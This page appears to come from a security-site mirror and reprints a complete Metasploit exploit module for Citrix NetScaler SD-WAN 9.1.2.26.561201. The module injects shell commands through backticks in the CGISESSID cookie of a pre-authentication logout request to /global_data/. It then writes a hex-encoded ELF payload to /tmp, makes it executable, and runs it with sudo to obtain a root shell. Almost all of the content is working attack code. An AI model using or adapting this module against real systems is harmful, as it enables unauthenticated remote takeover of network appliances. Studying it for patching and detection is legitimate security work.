首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Netscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit)
来源:metasploit.com 作者:xort 发布时间:2017-07-21  
# Exploit Title: Citix SD-WAN logout cookie preauth Remote Command Injection Vulnerablity
# Date: 02/20/2017
# Exploit Author: xort @ Critical Start
# Vendor Homepage: www.citrix.com
# Software Link: https://www.citrix.com/downloads/cloudbridge/
# Version: 9.1.2.26.561201
# Tested on: 9.1.2.26.561201 (OS partition 4.6)
#           
# CVE : (awaiting cve)
 
# vuln: CGISESSID Cookie parameter
#  associated vuln urls:
#                       /global_data/
#           /global_data/headerdata
#           /log
#           /
#           /r9-1-2-26-561201/configuration/
#           /r9-1-2-26-561201/configuration/edit
#           /r9-1-2-26-561201/configuration/www.citrix.com [CGISESSID cookie]
#
# Description PreAuth Remote Root Citrix SD-WAN <= v9.1.2.26.561201. This exploit leverages a command injection bug.
#
# xort @ Critical Start
 
require 'msf/core'
 
class MetasploitModule < Msf::Exploit::Remote
    Rank = ExcellentRanking
    include  Exploit::Remote::Tcp
        include Msf::Exploit::Remote::HttpClient
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Citrix SD-WAN CGISESSID Cookie Remote Root',
                    'Description'    => %q{
                    This module exploits a remote command execution vulnerability in the Citrix SD-WAN Appliace Version <=  v9.1.2.26.561201. The vulnerability exist in a section of the machine's session checking functionality. If the CGISESSID cookie holds shell-command data - it is used in a call to system where input is processed unsanitized.
            },
            'Author'         =>
                [
                    'xort@Critical Start', # vuln + metasploit module
                ],
            'Version'        => '$Revision: 1 $',
            'References'     =>
                [
                    [ 'none', 'none'],
                ],
            'Platform'      => [ 'linux'],
            'Privileged'     => true,
             'Arch'          => [ ARCH_X86 ],
                        'SessionTypes'  => [ 'shell' ],
                'Payload'        =>
                                {
                                  'Compat' =>
                                  {
                                        'ConnectionType' => 'find',
                                  }
                                },
 
            'Targets'        =>
                [
                    ['Linux Universal',
                        {
                                'Arch' => ARCH_X86,
                                'Platform' => 'linux'
                        }
                    ],
                ],
            'DefaultTarget' => 0))
 
            register_options(
                [
                    OptString.new('CMD', [ false, 'Command to execute', "" ]), 
                    Opt::RPORT(443),
                ], self.class)
    end
 
    def run_command(cmd)
 
        vprint_status( "Running Command...\n" )
 
        # send request with payload
        res = send_request_cgi({
            'method' => 'POST',
                        'uri'     => "/global_data/",
            'vars_post' => {
                'action' => 'logout'
            },
                    'headers' => {
                            'Connection' => 'close',
                            'Cookie' => 'CGISESSID=e6f1106605b5e8bee6114a3b5a88c5b4`'+cmd+'`; APNConfigEditorSession=0qnfarge1v62simtqeb300lkc7;',
                        }
 
        })
 
 
        # pause to let things run smoothly
        sleep(2)
 
 
    end
 
    
    def exploit
        # timeout
        timeout = 1550;
 
        # pause to let things run smoothly
        sleep(2)
 
         #if no 'CMD' string - add code for root shell
                if not datastore['CMD'].nil? and not datastore['CMD'].empty?
 
                        cmd = datastore['CMD']
 
                        # Encode cmd payload
 
                        encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\x\1\2')
 
            # upload elf to /tmp/n , chmod +rx /tmp/n , then run /tmp/n (payload)
                        run_command("echo -e #{encoded_cmd}>/tmp/n")
                        run_command("chmod 755 /tmp/n")
                        run_command("sudo /tmp/n")
                else
                        # Encode payload to ELF file for deployment
                        elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
                        encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\x\1\2')
 
            # upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload)
                        run_command("echo -e #{encoded_elf}>/tmp/m")
                        run_command("chmod 755 /tmp/m")
                        run_command("sudo /tmp/m")
 
            # wait for magic
                        handler
            
                end
 
 
    end
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sonicwall < 8.1.0.2-14sv - 'si
·Metasploit RPC Console Command
·Sonicwall < 8.1.0.6-21sv - 'ge
·Easy Chat Server User Register
·Microsoft Windows Kernel - 'IO
·Microsoft Internet Explorer -
·Microsoft Internet Explorer 11
·MAWK 1.3.3-17 - Local Buffer O
·Microsoft Internet Explorer 11
·ManageEngine Desktop Central 1
·Hashicorp vagrant-vmware-fusio
·Razer Synapse 2.20.15.1104 - r
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved